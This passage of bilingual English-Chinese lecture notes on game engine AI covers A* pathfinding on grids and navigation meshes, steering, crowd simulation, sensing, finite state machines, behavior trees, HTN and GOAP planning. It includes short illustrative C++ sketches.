      $g(n)$:从起点到节点 $n$ 的路径的准确成本

    • $h(n)$: the estimated cost from node $n$ to the goal

      $h(n)$:从节点 $n$ 到目标的估计成本

    webp

    A* - Heuristic On Grids

    ​A* - 网格启发式算法

    • For 4 directions of movement, we can use Manhattan distance

      对于 4 个移动方向,我们可以使用曼哈顿距离(来计算 $g(n)$ 和 $h(n)$)

    • $D_1$: cost for moving to the adjacent node

      $D_1$:移动到相邻节点的成本

    • $h(n)=D_1\cdot(d_x+d_y)$

      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp
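    A compact A* sketch on a 4-connected grid using the Manhattan heuristic above, with $D_1 = 1$ (the grid encoding is an assumption for illustration):

    #include <cmath>
    #include <functional>
    #include <queue>
    #include <utility>
    #include <vector>

    struct Cell { int x, y; };

    // Returns the cost of the cheapest 4-connected path, or -1 if unreachable.
    // grid[y][x] != 0 means blocked; every step costs D1 = 1.
    int aStar(const std::vector<std::vector<int>>& grid, Cell start, Cell goal) {
        const int H = (int)grid.size(), W = (int)grid[0].size();
        auto h = [&](int x, int y) {                    // Manhattan heuristic h(n)
            return std::abs(x - goal.x) + std::abs(y - goal.y);
        };
        std::vector<std::vector<int>> g(H, std::vector<int>(W, -1));  // known cost g(n)
        using Entry = std::pair<int, std::pair<int, int>>;            // (f, (x, y))
        std::priority_queue<Entry, std::vector<Entry>, std::greater<Entry>> open;
        g[start.y][start.x] = 0;
        open.push({h(start.x, start.y), {start.x, start.y}});
        const int dx[4] = {1, -1, 0, 0}, dy[4] = {0, 0, 1, -1};
        while (!open.empty()) {
            auto [f, xy] = open.top(); open.pop();
            auto [x, y] = xy;
            if (x == goal.x && y == goal.y) return g[y][x];  // greedy: stop at the goal
            if (f > g[y][x] + h(x, y)) continue;             // stale queue entry
            for (int i = 0; i < 4; ++i) {
                int nx = x + dx[i], ny = y + dy[i];
                if (nx < 0 || ny < 0 || nx >= W || ny >= H || grid[ny][nx]) continue;
                int ng = g[y][x] + 1;
                if (g[ny][nx] == -1 || ng < g[ny][nx]) {
                    g[ny][nx] = ng;
                    open.push({ng + h(nx, ny), {nx, ny}});   // f(n) = g(n) + h(n)
                }
            }
        }
        return -1;
    }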

    A*- Heuristic On NavMesh

    ​A*- NavMesh 上的启发式方法

    Multiple choices when evaluating cost on NavMesh

    ​评估 NavMesh 上的成本时有多种选择

    • Using polygon centers or vertices usually over-estimates the cost

      使用多边形中心或顶点通常会高估成本

    • Using hybrid method introduces too many points to check

      使用混合方法会引入太多要检查的点

    • Midpoints of edges - a good balance

    (选用区域的)边缘的中点 - 良好的平衡

    webp

    • On a navigation mesh that allows any angle of movement, use a straight-line distance

      在允许任意角度移动的导航网格上,使用直线距离

    • Use the midpoint of the edge entering the current node as the node's cost calculation point

      使用进入当前节点的边缘中点作为节点成本计算点

    • $D$: the cost for moving unit distance in any direction

      $D$:向任意方向移动单位距离的成本

      • $h(n)=D\cdot\sqrt{d_x\cdot d_x+d_y\cdot d_y}$
      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*-NavMesh Walkthrough

    ​A*-NavMesh 演练

    webp

    A*- Heuristic

    ​A*- 启发式

    • $h(n)$ controls $A^*$'s behavior.

      $h(n)$ 控制 $A^*$ 的行为。

    • With 100% accurate estimates, get shortest paths quickly

      以 100% 准确的估计,快速获得最短路径

    • Too low, continue to get shortest paths, but slow down

      太低,继续获得最短路径,但速度会减慢

    • Too high, exits early without the shortest path. Balance between pathfinding speed and accuracy

      太高,提前退出,得不到最短路径。需要在寻路速度和准确性之间取得平衡

    Path Smoothing

    ​路径平滑

    • Why we need path smoothing

      为什么我们需要路径平滑

      • Zigzag, many unnecessary turns

        之字形,许多不必要的转弯

    • “String Pulling”- Funnel Algorithm

      “拉线”- 漏斗算法

    webp

    Path Smoothing-Funnel Algorithm

    ​路径平滑漏斗算法

    • The scope of the funnel is the possible scope of the path

      漏斗的范围是路径的可能范围

    • Narrow the funnel if necessary to fit the portal

      必要时缩小漏斗以适应门户

    webp

    Terminate when the goal is in the funnel

    ​当目标处于漏斗中时终止

    webp

    NavMesh Generation - Voxelization

    ​NavMesh 生成-体素化

    Sample the collision scene by voxelization

    ​通过体素化对碰撞场景进行采样

    webp

    NavMesh Generation - Region Segmentation

    ​NavMesh 生成-区域分割

    • Calculate the distance of each voxel to border

      计算每个体素到边界的距离

    • Mark border voxels by AgentRadius to avoid clipping

      通过 AgentRadius 标记边界体素以避免剪切

    webp

    Watershed Algorithm

    ​分水岭算法

    • Gradually “flood” the “terrain”

      逐渐“淹没”“地形”

    • Form “watershed” (dividing ridge) when “pools” meet

      当“水池”相遇时形成“分水岭”(即分隔的山脊)

    webp

    Segment the “neighboring” voxels into regions to provide a good basis for the polygon mesh

    ​将“相邻”体素分割成区域,为多边形网格提供良好的基础

    webp

    Regions don’t have overlapping voxels in 2D

    ​区域在 2D 中没有重叠体素

    webp

    NavMesh Generation - Mesh Generation

    ​NavMesh 生成-网格生成

    Generate NavMesh from segmented regions

    ​从分段区域生成 NavMesh

    webp

    Nowadays there are plugins that implement this.

    NavMesh Advanced Features - Polygon Flags

    ​NavMesh 高级功能-多边形标记

    Useful for marking terrain types: plains, mountain, water, etc.

    ​用于标记地形类型:平原、山脉、水域等。

    • “Paint colors" to add user-defined regions

      “绘制颜色”以添加用户定义的区域

    • Polygons generated from user-defined regions have special flag

      从用户定义的区域生成的多边形具有特殊标记

    webp

    NavMesh Advanced Features - Tiles

    ​NavMesh 高级功能-Tile

    • Fast for responding to dynamic objects

      快速响应动态对象

    • Avoid rebuilding the entire NavMesh

      避免重建整个 NavMesh

    • TileSize - trade-off between pathfinding and dynamic rebuilding performance

      TileSize- 寻路和动态重建性能之间的权衡

    webp

    In a game, the navigation mesh may change at runtime.

    NavMesh Advanced Features - Off-mesh Links

    ​NavMesh 高级功能-网格外链接

    Allow agents to jump or teleport

    ​允许代理跳跃或传送

    webp

    Steering

    ​转向

    From Path to Motion

    ​从路径到运动

    • Cars cannot follow planned path exactly

      汽车无法完全遵循计划的路径(车辆具有转向半径)

    • The motion of cars is limited by their motion abilities:

      汽车的运动受到其运动能力的限制:

      • Linear acceleration (throttle/brake)

        线性加速度(油门/刹车)

      • Angular acceleration (steering force)

        角加速度(转向力)

    • Motion needs to be adjusted according to the limits

      运动需要根据限制进行调整

    webp

    Steering Behaviors

    ​转向行为

    webp

    • Seek / Flee

      寻找 / 逃跑

    • Velocity Match

      速度匹配(从起点出发加速,减速到终点停止)

    • Align

      对齐(让车头朝着某个方向)

    Seek/Flee

    ​寻找/逃跑

    Steer the agent towards / away from the target

    ​引导代理朝向/远离目标

    • Position matching in nature

      自然中的位置匹配

    • Accelerate with max acceleration towards / away from the target

      以最大加速度朝向/远离目标加速

    • Will oscillate around the target

      会围绕目标振荡

    • Input:

      输入:

      • Self position

        自身位置

      • Target position

        目标位置

    • Output:

      输出:

      • Acceleration

        加速度

    webp
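    A sketch of Seek/Flee following the inputs and outputs listed above (`Vec2` and `maxAccel` are assumptions, not a particular engine's types):

    #include <cmath>

    struct Vec2 {
        float x = 0, y = 0;
        Vec2 operator-(const Vec2& o) const { return {x - o.x, y - o.y}; }
        Vec2 operator*(float s) const { return {x * s, y * s}; }
        float length() const { return std::sqrt(x * x + y * y); }
    };

    // Seek: full acceleration toward the target; this is why the agent
    // oscillates around the target instead of stopping on it.
    Vec2 seek(const Vec2& selfPos, const Vec2& targetPos, float maxAccel) {
        Vec2 dir = targetPos - selfPos;
        float len = dir.length();
        if (len < 1e-5f) return {};        // already at the target
        return dir * (maxAccel / len);     // normalized direction * max acceleration
    }

    // Flee: same idea with the direction reversed.
    Vec2 flee(const Vec2& selfPos, const Vec2& targetPos, float maxAccel) {
        return seek(targetPos, selfPos, maxAccel);
    }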

    Seek / Flee Variations

    ​寻找 / 逃离变体

    Modifying the target at runtime can generate new steering behaviors

    ​在运行时修改目标可以生成新的转向行为

    webp

    • Pursue

      追寻

    • Path Following

      路径跟随

    • Wander

      漫游

    • Flow Field Following

      流场跟随

    Velocity Match

    ​速度匹配

    Matches the target velocity

    ​匹配目标速度

    • Calculate acceleration from matching time and velocity differences

      根据匹配时间和速度差异计算加速度

    • Clamp the acceleration by maximum acceleration of agents

      通过代理的最大加速度限制加速度

    • Input:

      输入:

      • Target velocity

        目标速度

      • Self velocity

        自身速度

      • Matching time

        匹配时间

    • Output:

      输出:

      • Acceleration

        加速度
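    The calculation described above fits in one function (a sketch reusing the `Vec2` shape from the Seek example):

    // accel = (targetVel - selfVel) / matchingTime, clamped to the agent's maximum.
    Vec2 velocityMatch(const Vec2& selfVel, const Vec2& targetVel,
                       float matchingTime, float maxAccel) {
        Vec2 a = (targetVel - selfVel) * (1.0f / matchingTime);
        float len = a.length();
        if (len > maxAccel) a = a * (maxAccel / len);  // clamp by max acceleration
        return a;
    }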

    Align

    ​对齐

    Matches target orientation

    ​匹配目标方向

    • Input:

      输入:

      • Target orientation

        目标方向

      • Self orientation

        自我定位

    • Output:

      输出:

      • Angular acceleration

        角加速度

    webp

    Crowd Simulation

    ​人群模拟

    Crowd

    ​人群

    A large group of individuals sharing the same environment, acting alone or in groups

    ​一大群人单独或成群地在同一环境中分享信息

    • Collision avoidance

      避免碰撞

    • Swarming

      蜂拥

    • Motion in formation

      形成队列运动

    webp

    Crowd Simulation Models

    ​人群模拟模型

    • Started from Reynolds’ “Boids” system

      从雷诺的 “Boids” 系统开始

    • Three families of models:

      三个模型系列:

      • Microscopic models

        微观模型

        • “Bottom-Up”

          “自下而上”

        • Focus on individuals

          关注个体

      • Macroscopic models

        宏观模型

        • Crowd as a unified and continuous entity

          人群作为一个统一且连续的实体

      • Mesoscopic models

        中观模型

        • Divide the crowd into groups

          将人群分成几组

    Microscopic Models-Rule-based Models

    ​微观模型-基于规则的模型

    Flock dynamics of animal crowds emerge by modeling the motion of each individual with simple predefined rules (see the sketch below):

    ​通过使用简单的预定义规则对每个个体的运动进行建模,将动物群体的群体动态视为一种突发行为:

    • Separation: to steer away from all of its neighbors

      分离:远离所有邻居

    • Cohesion: to steer towards the “center of mass”

      凝聚:转向“重心”

    • Alignment: to line up with agents close by

      对齐:与附近的代理对齐

    webp

    • Separation

      分离

    • Cohesion

      凝聚

    • Alignment

      对齐

    webp

    Easy to implement, but not suitable to simulate complex behavior rules.

    ​易于实现,但不适合模拟复杂的行为规则。
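    A sketch of the three rules combined for one boid (the weights and the neighbor query are illustrative; tuning them changes the emergent flocking):

    #include <vector>

    struct Vec2 {
        float x = 0, y = 0;
        Vec2 operator+(const Vec2& o) const { return {x + o.x, y + o.y}; }
        Vec2 operator-(const Vec2& o) const { return {x - o.x, y - o.y}; }
        Vec2 operator*(float s) const { return {x * s, y * s}; }
    };

    struct Boid { Vec2 pos, vel; };

    // Steering for one boid given its neighbors within some radius.
    Vec2 boidSteer(const Boid& self, const std::vector<Boid>& neighbors) {
        if (neighbors.empty()) return {};
        Vec2 sep, center, avgVel;
        for (const Boid& n : neighbors) {
            sep = sep + (self.pos - n.pos);  // Separation: push away from each neighbor
            center = center + n.pos;         // Cohesion: accumulate the center of mass
            avgVel = avgVel + n.vel;         // Alignment: accumulate headings
        }
        float k = 1.0f / (float)neighbors.size();
        Vec2 cohesion = center * k - self.pos;
        Vec2 alignment = avgVel * k - self.vel;
        return sep * 1.5f + cohesion * 1.0f + alignment * 1.0f;  // illustrative weights
    }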

    Macroscopic Models

    ​宏观模型

    Simulate crowd motion from a macro perspective

    ​从宏观角度模拟人群运动

    • Treat the crowd as a unified and continuous entity

      将人群视为统一且连续的实体(避免逐个计算影响性能)

    • Control motions with potential field or fluid dynamics

      用势场或流体动力学控制运动

    • Does not consider interactions between individuals and the environment at the individual level

      不考虑个体与环境在个体层面上的相互作用

    webp

    Mesoscopic Models

    ​中观模型

    Simulate crowd motion taking care of both details and the whole

    ​模拟人群运动,兼顾细节和整体

    • Divide the crowd into groups

      将人群分成几组

    • Deals with interactions between groups and individuals in each group

      处理群体之间以及每个群体中个人之间的互动

    • Combinations of microscopic models and formation rules or psychological models

      微观模型与形成规则或心理模型的组合

    webp

    Collision Avoidance-Force-based Models

    ​碰撞避免-基于力的模型

    • A mixture of socio-psychological and physical forces influencing the behavior in a crowd

      影响人群行为的社会心理和物理力量的混合

    • The actual movement of an individual depends on the desired velocity and its interaction with the environment

      个人的实际运动取决于所需速度及其与环境的相互作用

    • Can simulate dynamical features of escape panic in crowds

      可以模拟逃离人群恐慌的动态特征

    webp

    Pros:

    ​优点:

    • can be extended to simulate more emergent behaviors of human crowds

      可以扩展以模拟更多人群突发行为

    Cons:

    ​缺点:

    • Similar to physics simulation, simulation step should be small enough

      与物理模拟类似,模拟步骤应该足够小

    webp

    Collision Avoidance-Velocity-based models

    ​碰撞避免-基于速度的模型

    Consider the neighbor information to make decisions in velocity space

    ​考虑邻居信息以在速度空间中做出决策

    • able to simulate in local space

      能够在局部空间中进行模拟

    • applied to collision avoidance

      应用于碰撞避免

    Reciprocal Velocity Obstacle methods - the current standard collision avoidance algorithms

    ​相互速度障碍方法-当前标准碰撞避免算法

    • Velocity Obstacle (VO)

      速度障碍 (VO)

    • Reciprocal Velocity Obstacle (RVO)

      相互速度障碍 (RVO)

    • Optimal Reciprocal Collision Avoidance (ORCA)

      最佳相互碰撞避免 (ORCA)

    webp

    Velocity obstacle (VO)

    ​速度障碍 (VO)

    • Calculate its own dodge velocity, assuming other agent is unresponsive

      假设其他代理没有响应,计算自己的躲避速度

    • Appropriate for static and unresponsive obstacles

      适用于静态和无响应的障碍物

    • Overshoot

      超调

    • Causes oscillation between two agents attempting to avoid each other

      导致两个试图相互避开的代理之间发生振荡

    webp

    Reciprocal Velocity Obstacle (RVO)

    ​相互速度障碍 (RVO)

    • Assuming the other agent is using the same decision process (mutually cooperating)

      假设其他代理使用相同的决策过程(相互合作)

    • Both sides move halfway out of the way of a collision

      双方都向半路移动以避免碰撞

    • Only guarantees no oscillation and avoidance for two agents

      仅保证两个代理不会发生振荡和避免碰撞

    Optimal Reciprocal Collision Avoidance (ORCA)

    ​最佳相互碰撞避免 (ORCA)

    webp

    Sensing

    ​传感

    Sensing or Perception

    ​传感或感知

    webp

    Internal Information

    ​内部信息

    • Information of the agent itself

      agent 本身的信息

      • Position

        位置

      • HP

        生命值

      • Armor status

        护甲状态

      • Buff status

        增益状态

    • Can be accessed freely

      可自由访问

    Static Spatial information

    ​静态空间信息

    webp

    • Navigation Data

      导航数据

    • Tactical Map

      战术地图

    • Smart Object

      智能对象

    • Cover Point

      掩护点

    Dynamic Spatial information (1/2) - influence Map

    ​动态空间信息(1/2)- 影响力地图

    webp

    Dynamic Spatial Information (2/2) - Game Objects

    ​动态空间信息 (2/2) - 游戏对象

    • Information being sensed from a character

      从角色感知到的信息

    • Multiple character information can exist for a single character as it can be sensed by multiple agents

      单个角色可以存在多个角色信息,因为它可以被多个代理感知

    • Usually contains:

      通常包含:

      • Game Object ID

        游戏对象 ID

      • Visibility

        可见性

      • Last Sensed Method

        最后感知的方法

      • Last Sensed Position

        最后感知的位置

    Sensing Simulation

    ​传感模拟

    • Light, sound, and odor travels in space

      光、声音和气味在空间中传播

    • Have max traveling range

      具有最大传播范围

    • Attenuates in space and time with different patterns

      以不同的模式在空间和时间中衰减

      • Sight is blocked by obstacles

        视线被障碍物阻挡

      • Smelling ranges shrinks over time

        嗅觉范围随时间缩小

    • Radiating field can simulate sensing signals

      辐射场可以模拟传感信号

      • Can be simplified as Influence Map

        可以简化为影响图

      • Agents covered by the field can sense the information

        场覆盖的代理可以感知信息

    webp

    Classic Decision Making Algorithms

    ​经典决策算法

    Decision Making Algorithms

    ​决策算法

    • Finite State Machine

      有限状态机

    • Behavior Tree

      行为树

    • Hierarchical Tasks Network

      分层任务网络

    • Goal Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Deep Learning

      深度学习

    Finite State Machine

    ​有限状态机

    • Change from one State to another according to some Conditions

      根据某些条件从一个状态变为另一个状态

    • The change from one state to another is called a Transition

      从一个状态到另一个状态的改变称为转换

    webp

    webp

    A classic game AI example: Pac-Man.
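    A minimal sketch of such a state machine as an enum plus a transition function (the states and conditions loosely follow the Pac-Man ghost example; all names are illustrative):

    enum class GhostState { Chase, Scatter, Frightened };

    struct GhostInput {
        bool powerPelletEaten;  // the player just ate a power pellet
        bool timerExpired;      // the current mode's timer ran out
    };

    // Transition: pick the next state from the current state and the conditions.
    GhostState transition(GhostState s, const GhostInput& in) {
        if (in.powerPelletEaten) return GhostState::Frightened;
        switch (s) {
            case GhostState::Chase:      return in.timerExpired ? GhostState::Scatter : s;
            case GhostState::Scatter:    return in.timerExpired ? GhostState::Chase : s;
            case GhostState::Frightened: return in.timerExpired ? GhostState::Chase : s;
        }
        return s;
    }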

    Finite State Machine - Pros & Cons

    ​有限状态机 - 优点和缺点

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Easy to understand

      易于理解

    • Very fast to deal with simple case

      处理简单情况非常快

    Cons:

    ​缺点:

    • Maintainability is bad, especially when adding or removing states

      可维护性差,尤其是添加或删除状态

    • Reusability is bad; it can't be used in other projects or for other characters

      可重用性差,不能用于其他项目或角色

    • Scalability is bad; hard to modify for complicated cases

      可扩展性差,复杂情况下难以修改

    webp

    Hierarchical Finite State Machine (HFSM)

    ​分层有限状态机 (HFSM)

    Tradeoff between reactivity and modularity

    ​反应性和模块化之间的权衡

    • Reactivity: the ability to quickly and efficiently react to changes

      反应性:快速高效地对变化做出反应的能力

    • Modularity: the degree to which a system’s components may be separated into building blocks, and recombined

      模块化:系统组件可分离成构建块并重新组合的程度

    webp

    Behavior Tree (BT)


    Focus on state abstraction and transition conditions

    ​关注状态抽象和转换条件

    webp

    Similar to human thinking:

    ​类似于人类的思维:

    • If ghost close, run away

      如果鬼靠近,就逃跑

    • But if I’m powerful, chase it

      但如果我很强大,就去追它

    • Otherwise, eating

      否则,就吃

    webp

    Behavior Tree - Execution Nodes

    ​行为树 - 执行节点

    Execution node (leaf node)

    ​执行节点(叶节点)

    • Condition node

      条件节点

    • Action node

      动作节点

    webp

    Behavior Tree - Control Nodes

    ​行为树-控制节点

    Control flow node (internal node)

    ​控制流节点(内部节点)

    • Control flow determined by the return value of child nodes

      控制流由子节点的返回值决定

    • Each node has a return value, which is success, failure, or running

      每个节点都有一个返回值,即成功、失败或正在运行

    webp

    Control Node-Sequence (1/2)

    ​控制节点顺序 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Failure or Running then return value accordingly

        直到一个子节点返回失败或正在运行,然后相应地返回值

      • or all children return Success, then return Success

        或所有子节点都返回成功,然后返回成功

    • If Stop and Return Running

      如果停止并返回正在运行

      • the next execution will start from the running action

        下一次执行将从正在运行的操作开始

    webp

    Control Node-Sequence (2/2)

    Sequence

    ​序列

    • Allows designers to make a “plan”

      允许设计师制定“计划”

    webp

    Control Node-Selector (1/2)

    ​控制节点选择器 (1/2)

    • Order

      顺序

      • Execute children from left to right

        从左到右执行子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • until one child returns Success or Running, then return value accordingly

        直到一个子节点返回 Success 或 Running,然后相应地返回值

      • or all children return Failure, then return Failure

        或所有子节点都返回 Failure,然后返回 Failure

    • If Stop and Return Running, the next execution will start from the running action

      如果 Stop 并 Return Running,则下一次执行将从 running 操作开始

    webp

    Control Node-Selector (2/2)

    ​控制节点选择器 (2/2)

    Selector

    ​选择器

    • Could select one action to do response to different environment

      可以选择一个动作来响应不同的环境

    • Could do the right thing according to priority

      可以根据优先级做正确的事情

    webp

    Control Node- Parallel (1/2)

    ​控制节点 - 并行 (1/2)

    • Order

      顺序

      • Logically execute all children simultaneously

        逻辑上同时执行所有子节点

    • Stop Condition and Return Value

      停止条件和返回值

      • Return Success when at least M child nodes (between 1 and N) have succeeded

        当至少 M 个子节点(介于 1 和 N 之间)成功时返回成功

      • Return Failure when at least N - M + 1 child nodes (between 1 and N) have failed

        当至少 N - M + 1 个子节点(介于 1 和 N 之间)失败时返回失败

      • Otherwise return Running

        否则返回正在运行

    • If Stop and Return Running

      如果停止并返回正在运行

    • the next execution will start from the running actions

      下一次执行将从正在运行的操作开始

    webp

    Control Node - Parallel (2/2)

    ​控制节点 - 并行 (2/2)

    Parallel

    ​并行

    • Could do multiple things “at the same time”

      可以同时做多件事

    webp

    Behavior Tree

    ​行为树

    Execution nodes

    ​执行节点

    • Action

      操作

    • Condition

      条件

    Control flow nodes

    ​控制流节点

    • Sequence

      序列

    • Selector

      选择器

    • Parallel

      并行

    | Node Type | Symbol | Succeeds | Fails | Running |
    | --- | --- | --- | --- | --- |
    | Sequence | webp | If all children succeed | If one child fails | If one child returns Running |
    | Selector | webp | If one child succeeds | If all children fail | If one child returns Running |
    | Parallel | webp | If ≥ M children succeed | If > N - M children fail | else |
    | Condition | webp | Upon completion | If impossible to complete | During completion |
    | Action | webp | If true | If false | Never |

    Tick a Behavior Tree

    ​Tick(更新)行为树

    • The tick of BT is like thinking

      BT 的 Tick 就像思考

    • Every tick starts from the root node

      每次 Tick 都从根节点开始

    • Go through different nodes from up to down, left to right

      从上到下、从左到右遍历不同的节点

    • Each node must return failure, success or running

      每个节点必须返回失败、成功或正在运行

    webp
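    A sketch of Sequence and Selector under this tick model (minimal interfaces, omitting the "resume from the running action" optimization; not any engine's BT API):

    #include <memory>
    #include <vector>

    enum class Status { Success, Failure, Running };

    struct BTNode {
        virtual ~BTNode() = default;
        virtual Status tick() = 0;  // every tick walks the tree from the root
    };

    // Sequence: run children left to right; stop on Failure or Running.
    struct Sequence : BTNode {
        std::vector<std::unique_ptr<BTNode>> children;
        Status tick() override {
            for (auto& c : children) {
                Status s = c->tick();
                if (s != Status::Success) return s;  // Failure/Running bubbles up
            }
            return Status::Success;                  // all children succeeded
        }
    };

    // Selector: run children left to right; stop on Success or Running.
    struct Selector : BTNode {
        std::vector<std::unique_ptr<BTNode>> children;
        Status tick() override {
            for (auto& c : children) {
                Status s = c->tick();
                if (s != Status::Failure) return s;  // Success/Running bubbles up
            }
            return Status::Failure;                  // all children failed
        }
    };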

    Behavior Tree-Decorator (1/2)

    ​行为树装饰器 (1/2)

    Decorator

    ​装饰器

    • A special kind of control node with a single child node

      一种特殊的控制节点,只有一个子节点

    • Usually some behavior pattern which is commonly used

      通常是一些常用的行为模式

    webp

    • For example, some common policies:
      • Loop execution
      • Execute once
      • Timer
      • Time Limiter
      • Value Modifier
      • Etc.

    Behavior Tree - Decorator (2/2)

    ​行为树 - 装饰器 (2/2)

    Decorator

    ​装饰器

    • Example: Use timer to implement “patrol”

      示例:使用计时器实现“巡逻”

    webp

    Behavior Tree-Precondition

    ​行为树-前提条件

    Simplify behavior tree structure with preconditions

    ​使用前提条件简化行为树结构

    webp

    Behavior Tree-Blackboard

    ​行为树-黑板

    Blackboard: the memory of behavior tree

    ​黑板:行为树的记忆

    webp

    Behavior Tree - Pros

    ​行为树 - 优点

    • Modular, Hierarchical organization

      模块化、分层组织

      • each subtree of a BT can be seen as a module, with a standard interface given by the return statuses

        BT 的每个子树都可以看作一个模块,具有由返回状态给出的标准接口

    • Human readable

      人类可读

    • Easy to maintain

      易于维护

      • Modification only affect parts of tree

        修改仅影响树的部分

    webp

    • Reactivity

      反应性

      • Think every tick to quickly change behavior according to environment

        思考每一次滴答,根据环境快速改变行为

    • Easy to Debug

      易于调试

      • Every tick is a whole decision making process, so that it is easy to debug

        每一次滴答都是一个完整的决策过程,因此易于调试

    webp

    Behavior Tree - Cons

    ​行为树 - 缺点

    Cons

    ​缺点

    • Each tick starts from the root node, which costs more

      每次更新都从根节点开始,成本更高

    • The more reactive, the more conditions must be checked and the higher the cost per tick

      反应性越高,需要检查的条件就越多,每次更新的成本就越高

    Upcoming: Al Planning and Goals

    ​即将推出:人工智能规划和目标

    To make the AI more deliberative, game designers introduced the AI Planning technique to improve the planning ability of AI

    ​为了让人工智能更具深思熟虑,游戏设计师引入了人工智能规划技术来提高人工智能的规划能力

    AI Planning:

    ​人工智能规划:

    • Manage a set of actions

      管理一组动作

    • A planner makes a plan according to the initial world state

      规划者根据初始世界状态制定计划

    webp

    Reference

    Steering & Sensing

    Crowd Simulation

    Classical Decision Making Algorithms

    第十七节:游戏引擎 Gameplay 玩法系统:高级 AI

    Advanced Artificial Intelligence

    ​高级 AI

    • Hierarchical Tasks Network

      分层任务网络

    • Goal-Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Machine Learning Basic

      机器学习基础

    • Build Advanced Game AI

      构建高级游戏人工智能

    Hierarchical Tasks Network

    ​层次任务网络

    Overview

    HTN assumes there are many Hierarchical tasks

    ​HTN 假设存在许多分层任务

    webp

    Make a Plan like Human

    ​像人类一样制定计划

    Hierarchical:

    ​分层:

    • People in the real world usually make their plans hierarchically

      现实世界中的人们通常分层制定计划

    webp

    The methods I might need in order to complete “Take a class”.

    HTN Framework (1/2)

    ​HTN 框架

    World state

    ​世界状态

    • Contains a bunch of properties

      包含一系列属性

    • Input to planner, reflect the status of world

      输入到规划器,反映世界的状态

    • It's a subjective world view in the AI's brain

      它是人工智能大脑中的主体世界观

    Sensors

    ​传感器

    • Perceive changes of environment and modify world state

      感知环境变化并修改世界状态

    • It’s more like Perception

      它更像是感知

    webp

    HTN Framework (2/2)

    HTN Domain

    ​HTN 域

    • Load from asset

      从资产加载

    • Describe the relationship of hierarchical tasks

      描述分层任务的关系

    Planner

    ​规划器

    • Make a plan from World State and HTN Domain

      根据世界状态和 HTN 域制定计划

    Plan Runner

    ​计划运行器

    • Running the plan

      运行计划

    • Update the world state after the task

      任务完成后更新世界状态

    webp

    HTN Task Types

    ​HTN 任务类型

    Two types of Tasks

    ​两种类型的任务

    • Primitive Task

      原始任务

    • Compound Task

      复合任务

    webp

    Primitive Task (1/2)

    ​原始任务 (1/2)

    • Preconditions

      前提条件

      • Determine whether an action could be executed

        确定是否可以执行某个操作

      • Check whether properties of game world being satisfied

        检查游戏世界的属性是否得到满足

    • Action

      操作

      • Determine what action the primitive task executes

        确定原始任务执行什么操作

    • Effects

      效果

      • Describe how the primitive task modify the game world state properties

        描述原始任务如何修改游戏世界状态属性

    webp

    webp

    • Precondition: have an antidote
    • Action: use the antidote
    • Effect: remove the debuff, consume the antidote

    Compound Task (1/2)

    ​复合任务 (1/2)

    Compound Tasks

    ​复合任务

    • Contain several methods

      包含多种方法

    • Methods have different priority

      方法具有不同的优先级

    • Each method has preconditions

      每种方法都有先决条件

    Method

    ​方法

    • contains a chain of sub-Tasks

      包含一系列子任务

    • Sub-task could be a primitive task or a compound task

      子任务可以是原始任务或复合任务

    webp

    webp

    The detoxify task:

    • With enough materials — craft an antidote
    • With enough money — buy an antidote
    • Finally, use the antidote to cure the poison

    HTN Domain

    webp

    webp

    Planning

    Step 1

    • Start from the root task

      从根任务开始

    • Choose the method satisfying the precondition in order

      按顺序选择满足前提条件的方法

    webp

    Step 2

    • Decompose the method to tasks

      将方法分解为任务

    • Check precondition in order

      按顺序检查前提条件

    • Decompose the task if it is a compound task

      如果任务是复合任务,则将其分解

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • Assume all actions will succeed; update the “world state” in temporary memory

      假设所有操作都会成功,在临时内存中更新“世界状态”

    • The world state has a duplicated copy in the planning phase, used as scratch paper

      世界状态在规划阶段有一份草稿纸的副本

    webp

    Step 2 (For primitive tasks)

    ​第 2 步(针对原始任务)

    • go back and select a new method if precondition is not satisfied

      如果先决条件不满足,则返回并选择新方法

    webp

    Step 2 (For compound task)

    ​第 2 步(针对复合任务)

    • select the next method if precondition is not satisfied

      如果先决条件不满足,则选择下一个方法

    webp

    Step 3

    • Repeat step 2 until no more task needs to be done

      重复步骤 2,直到不再需要完成任务

    • The final plan contains only primitive tasks

      最终计划仅包含原始任务

    webp

    webp

    Run plan

    ​运行计划

    Run plan

    ​运行计划

    • Execute tasks in order

      按顺序执行任务

    • Stop when all tasks succeed, or when one task fails

      停止直到所有任务成功,或一个任务失败

    Execute task

    ​执行任务

    • Check precondition and return failure if not satisfied

      检查先决条件,如果不满足则返回失败

    • Execute action

      执行操作

      • if succeed -> update world state and return success

        如果成功 -> 更新世界状态并返回成功

      • if failed -> return failure

        如果失败 -> 返回失败

    webp

    Replan

    ​重新规划

    There are three situations in which the agent starts planning

    ​代理可以在三种情况下启动计划

    • Not have a plan

      没有计划

    • The current plan is finished or failed

      当前计划已完成或失败

    • The World State changes via its sensor

      世界状态通过其传感器发生变化

    webp

    Conclusion

    ​结论

    Pros:

    ​优点:

    • HTN is similar to BT, and it is more high-level

      HTN 与 BT 类似,但更高级

    • It outputs a plan which has long-term effect

      它输出具有长期效果的计划

    • It would be faster compared to the BT in the same case

      在相同情况下,它比 BT 更快

    Cons:

    ​缺点:

    • The player's behavior is unpredictable, so the tasks may easily fail

      玩家行为不可预测,因此任务可能很容易失败

    • Designing the world state and the effects of tasks is challenging for designers

      世界状态和任务效果对设计师来说具有挑战性

    Goal-Oriented Action Planning

    ​以目标为导向的行动计划

    Goal-Oriented Action Planning (GOAP)

    ​目标导向行动计划 (GOAP)

    • GOAP is more automated

      GOAP 更加自动化

    • It takes backward planning rather than forward

      它需要向后规划,而不是向前规划

    webp

    Structure

    ​结构

    Sensors and World State

    ​传感器和世界状态

    • Similar to HTN

      类似于 HTN

    Goal set

    ​目标集

    • All available goals

      所有可用目标

    Action set

    ​行动集

    • All available actions

      所有可用行动

    Planning

    ​规划

    • Output sequence of actions

      输出行动序列

    webp

    Goal Set

    ​目标集

    • Precondition decides which goal will be selected

      前提条件决定选择哪个目标

